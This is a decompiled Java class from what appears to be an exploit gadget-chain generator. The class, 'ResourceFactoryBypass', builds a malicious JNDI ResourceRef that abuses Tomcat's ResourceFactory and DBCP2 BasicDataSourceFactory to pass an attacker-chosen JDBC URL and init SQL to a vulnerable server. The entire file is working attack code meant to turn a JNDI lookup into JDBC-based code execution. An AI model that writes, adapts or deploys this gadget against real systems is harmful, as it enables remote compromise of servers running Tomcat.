/*
 * Decompiled with CFR 0.152.
 */
package com.ar3h.chains.gadget.impl.jndi.factory.datasourcefactory;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.exception.ThrowsUtil;
import com.ar3h.chains.common.util.CommonMethod;
import java.util.List;
import java.util.Map;
import javax.naming.RefAddr;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import org.apache.naming.ResourceRef;

@GadgetTags(tags={"ResourceRef"}, nextTags={"JdbcUrlChains", "JdbcUrlWithSQLChains"})
@GadgetAnnotation(name="ResourceFactoryBypass", description="factory: org.apache.naming.factory.ResourceFactory\n\u5982\u679c\u7cfb\u7edf\u73af\u5883\u53d8\u91cf\u4e0d\u5b58\u5728, \u5219\u4f1a\u9ed8\u8ba4\u4f7f\u7528 org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory\uff0c\u6700\u7ec8\u5b9e\u73b0\u5b9e\u73b0JDBC\u7684\u5229\u7528", dependencies={"tomcat-dbcp2"}, authors={"Unam4"}, priority=20)
public class ResourceFactoryBypass
implements Gadget {
    private String driverClassName;

    public Reference getObject(String jdbcUrl, String sql) throws Exception {
        ResourceRef ref = new ResourceRef("java.sql.DataSource", null, "", "", true, "org.apache.naming.factory.ResourceFactory", null);
        ref.add((RefAddr)new StringRefAddr("driverClassName", this.driverClassName));
        ref.add((RefAddr)new StringRefAddr("url", jdbcUrl));
        ref.add((RefAddr)new StringRefAddr("initialSize", "1"));
        if (sql != null) {
            ref.add((RefAddr)new StringRefAddr("connectionInitSqls", sql));
        }
        return ref;
    }

    @Override
    public Object invoke(GadgetContext context, GadgetChain chain) throws Exception {
        Object jdbcObj = chain.doCreate(context);
        this.driverClassName = context.getString(ContextTag.DRIVER_CLASS_NAME_KEY);
        String jdbcUrl = null;
        String sql = null;
        if (jdbcObj instanceof String) {
            jdbcUrl = (String)jdbcObj;
        } else if (jdbcObj instanceof Map) {
            Map jdbcMap = (Map)jdbcObj;
            jdbcUrl = (String)jdbcMap.get(ContextTag.JDBC_URL);
            sql = CommonMethod.handleSql((List)jdbcMap.get(ContextTag.JDBC_URL_SQL_LIST));
        } else {
            ThrowsUtil.throwNotFoundOptionGadgetExceptionNoPrefix("jdbcObj type is error: " + jdbcObj.getClass().getName());
        }
        return this.getObject(jdbcUrl, sql);
    }
}

